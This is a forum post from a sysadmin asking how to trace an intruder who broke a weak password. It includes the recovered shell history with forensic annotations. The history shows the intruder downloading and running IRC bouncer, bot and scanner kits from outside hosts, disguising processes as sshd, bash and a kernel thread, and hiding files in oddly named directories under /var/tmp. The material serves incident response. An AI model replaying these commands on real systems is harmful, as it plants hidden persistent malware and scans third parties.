Old 30th June 2009
knasbas knasbas is offline
Port Guard
 
Join Date: May 2008
Posts: 25
Default weak password=broken

I just found out that a user had a weak password and it was broken. How do I trace what the user has been doing?
I only see brief info in .bash_history (below).
Any help at all is welcome; I've changed the password and deleted the 2 directories I've found.
Not a single hit on robotbsd in Google makes me a bit worried.
Code:
# Start of the .bash_history recovered from the compromised account.
# History records what was typed, not whether it succeeded or what it printed,
# and the account owner can edit or truncate the file, so read it as a lower
# bound on activity and cross-check against login and process accounting.
# This first run is host survey: processes, OS and kernel, uptime, logged-in
# users. The bare wget presumably only checks that the tool is installed.
# NOTE(review): passwd is run here, so the intruder may have set a password of
# their own; other access paths of this account (authorized SSH keys, cron
# entries) are worth checking in addition to resetting the password.
ls
ps 'ux
uname
uname -a
uptime
wget
w
passwd
ls
uname -a
# Download, build and start of psyBNC 2.3.2-7 (psyBNC is an IRC bouncer).
# The tarball is requested with fetch and again with wget; the host and file
# name can be searched for in proxy, DNS and firewall logs.
fetch www.psybnc.net/psyBNC-2.3.2-7.tar.gz
wget
wget www.psybnc.net/psyBNC-2.3.2-7.tar.gz
ls
tar xvf psyBNC-2.3.2-7.tar.gz
tar xzvf psyBNC-2.3.2-7.tar.gz
ls
cd psybnc
ls
ls
# Editor sessions: history does not capture what was changed in these files.
pico menuconf
pico config.h
ls
pico psybncchk
ls
pico CHANGES
make
ls
# NOTE(review): psybnc.conf presumably holds the listening port and login of
# the bouncer; if a copy survives, keep it as evidence before deleting.
pico psybnc.conf
ls
rm -rf salt.h
# The built binary is renamed to sshd and PATH is set to the current directory
# so it can be started as plain sshd, presumably so that process listings show
# sshd instead of psybnc. An sshd process owned by an ordinary user and running
# out of a home directory is the indicator to look for.
mv psybnc sshd
export PATH="."
sshd
ps -ux
ls
exit
# Later login: two processes are killed, psybnc.conf is edited again and the
# renamed binary is restarted. The mistyped ps-ux is kept verbatim, which shows
# that history stores command lines whether or not they ran.
ps-ux
ps -ux
ls
# The PIDs are not identified by the history itself; presumably they are the
# earlier bouncer instances. They can be matched against process accounting
# records if accounting was enabled on the host.
kill -9 29089
ps -ux
kill -9 28097
ps -ux
ls
cd psybnc
ls
pico psybnc.conf
ls
# sshd is typed once before and once after PATH is pointed at the current
# directory; only the second form resolves to the local renamed binary.
sshd
export PATH="."
sshd
ps -ux
ls
exit
# Later login: the bouncer binary is renamed a second time (sshd to bash) and a
# second archive, robotlinux.tgz, is fetched and unpacked.
ls
-ps -ux
ls
ps -ux
ls
kill -9 12813
ls
ps -ux
ls
cd psybnc
ls
# Renaming to bash makes the process look like an ordinary login shell in a
# process listing; compare the executable path of each bash process, not only
# its name.
mv sshd bash
./bash
ps -ux
kill -9 12169
ls
cd ..
ls
# Second download host and archive name; both are usable as log search terms.
wget badry.uv.ro/robotlinux.tgz
ls
tar xvf robotlinux.tgz
# The quoted argument expands to a directory name made of dot, space, dot, dot,
# l. It starts with a dot, so plain ls hides it, and in ls -a output it is easy
# to misread as the normal dot and dot-dot entries.
cd ". .".l
ls
# NOTE(review): mech.set matches the configuration file name used by the
# EnergyMech IRC bot; unconfirmed without the archive contents.
pico mech.set
# The executable is named with square brackets, presumably to resemble a kernel
# thread in ps output. It is tried by path, then by bare name, then by bare name
# again after PATH is set to the current directory.
./[kupdateb]
[kupdateb]
export PATH="."
[kupdateb]
ls
exit
# Later login: a staging directory is created under /var/tmp and the BSD build
# of the same kit (robotbsd.tgz, same host as robotlinux.tgz) is unpacked there.
# /var/tmp is world-writable and is typically preserved across reboots, so
# content left here outlives a restart and sits outside the home directory.
ls
ls -a
cd /var/tmp
mkdir roxy
cd roxy/
ls
ls -a
wget badry.uv.ro/robotbsd.tgz
ls
tar xvf robotbsd.tgz
ls
# Same hidden naming scheme as the Linux archive, with suffix b: dot, space,
# dot, dot, b. If the commands succeeded this directory is inside /var/tmp/roxy.
cd ". .".b
ls
ls
# NOTE(review): m.session looks like a bot session or configuration file;
# history does not record what was written to it.
pico m.session
ls
# First start attempt is followed by chmod +x on every file in the directory,
# which suggests the first attempt failed for lack of execute permission.
./[kupdateb]
chmod +x *
ls
[kupdateb]
./
[kupdateb]
ls
cd ..
ls
ls
exit
# Later login: the psybnc build directory is deleted and rebuilt from the
# tarball, which is unpacked again without a new download, so the archive
# psyBNC-2.3.2-7.tar.gz was still present in the working directory at this time.
ls
ps -ux
cd psybnc
ls
cd ..
ls
rm -rf psybnc
ls
tar xvf psyBNC-2.3.2-7.tar.gz
tar xzvf psyBNC-2.3.2-7.tar.gz
ls
cd psybnc
ls
make
ls
# This build is renamed straight to bash and started from the build directory.
mv psybnc bash
./bash
ps -ux
ls
# Survey again before leaving: logged-in users, kernel, uptime.
w
uname -a
uptime
exit
# Two short logins with no changes recorded: process list, kernel, uptime and
# directory listings only. Presumably checks that the started processes and the
# hidden directories are still in place. Each exit marks one login, which gives
# a count of sessions to reconcile with the login records of the host.
ls
ps -ux
ls -a
exit
ps -ux
uname -a
uptime
ls -a
ls -a
exit
# Last recorded login: the bot is restarted from the hidden directory with
# suffix l, robotbsd.tgz is unpacked a second time, and a third archive from a
# new host is fetched and run.
ps -ux
uname -a
ls -a
cd ". .".l
ls
./[kupdateb]
ls
# This unpack is done directly in /var/tmp, not in /var/tmp/roxy. If the
# commands succeeded there is a second hidden directory (dot, space, dot, dot,
# b) at this level, in addition to the one created under roxy earlier.
cd /var/tmp
ls
ls
wget badry.uv.ro/robotbsd.tgz
ls
tar xvf robotbsd.tgz
ls
cd ". .".b
ls
./[kupdateb]
ls
ps -ux
uname -a
uptime
ls
cd ..
ls
ls
# Third download host and archive name; usable as log search terms.
wget bucus.tvn.hu/wtf.tgz
ls
# Interactive ftp client: commands typed inside it are not written to the shell
# history, so any transfer made here is invisible in this record.
ftp
tar xvf wtf.tgz
ls
cd wtf
ls
# NOTE(review): a is run twice with a two-octet argument, which resembles an
# address prefix handed to a network scanning kit; unverified without the
# archive. If so, this host generated outbound traffic toward third parties,
# which would show in firewall or flow logs for the times of this session.
./a 21.21
rm -rf a1
rm -rf scam
./a 53.21
exit